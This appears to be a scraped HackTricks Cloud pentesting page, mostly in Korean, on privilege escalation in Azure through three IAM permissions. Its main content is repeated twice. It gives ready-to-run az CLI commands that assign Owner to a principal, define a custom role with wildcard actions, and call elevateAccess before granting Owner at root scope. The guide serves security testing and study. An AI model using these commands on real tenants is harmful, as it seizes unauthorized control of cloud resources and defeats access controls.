Az - Azure IAM Privesc (Authorization)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Azure IAM

자세한 정보는 다음을 확인하세요:

https://github.com/HackTricks-wiki/hacktricks-cloud/blob/kr/pentesting-cloud/azure-security/az-services/az-azuread.md

Microsoft.Authorization/roleAssignments/write

이 권한은 특정 범위에 대해 주체에게 역할을 할당할 수 있게 하며, 공격자가 자신에게 더 높은 권한의 역할을 할당하여 권한을 상승시킬 수 있게 합니다:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

이 권한은 역할에 의해 부여된 권한을 수정할 수 있게 하여, 공격자가 자신이 할당한 역할에 더 많은 권한을 부여함으로써 권한 상승을 할 수 있게 합니다.

다음 내용으로 role.json 파일을 생성합니다:

{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": [
"*"
],
"NotActions": [],
"DataActions": [
"*"
],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}

그런 다음 이전 정의를 호출하여 역할 권한을 업데이트합니다:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

이 권한은 권한을 상승시키고 Azure 리소스에 대한 권한을 모든 주체에게 할당할 수 있도록 허용합니다. 이는 Entra ID Global Administrators에게 부여되어 Azure 리소스에 대한 권한을 관리할 수 있도록 하기 위한 것입니다.

사용자가 elevate 호출이 작동하기 위해서는 Entra ID의 Global Administrator여야 한다고 생각합니다.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"

HackTricks 지원하기

구독 계획 확인하기!
**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

PreviousAz - Privilege Escalation NextAz - EntraID Privesc

Last updated 3 days ago

Azure IAM

자세한 정보는 다음을 확인하세요:

https://github.com/HackTricks-wiki/hacktricks-cloud/blob/kr/pentesting-cloud/azure-security/az-services/az-azuread.md

Microsoft.Authorization/roleAssignments/write

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

다음 내용으로 role.json 파일을 생성합니다:

{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": [
"*"
],
"NotActions": [],
"DataActions": [
"*"
],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}

그런 다음 이전 정의를 호출하여 역할 권한을 업데이트합니다:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

사용자가 elevate 호출이 작동하기 위해서는 Entra ID의 Global Administrator여야 한다고 생각합니다.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"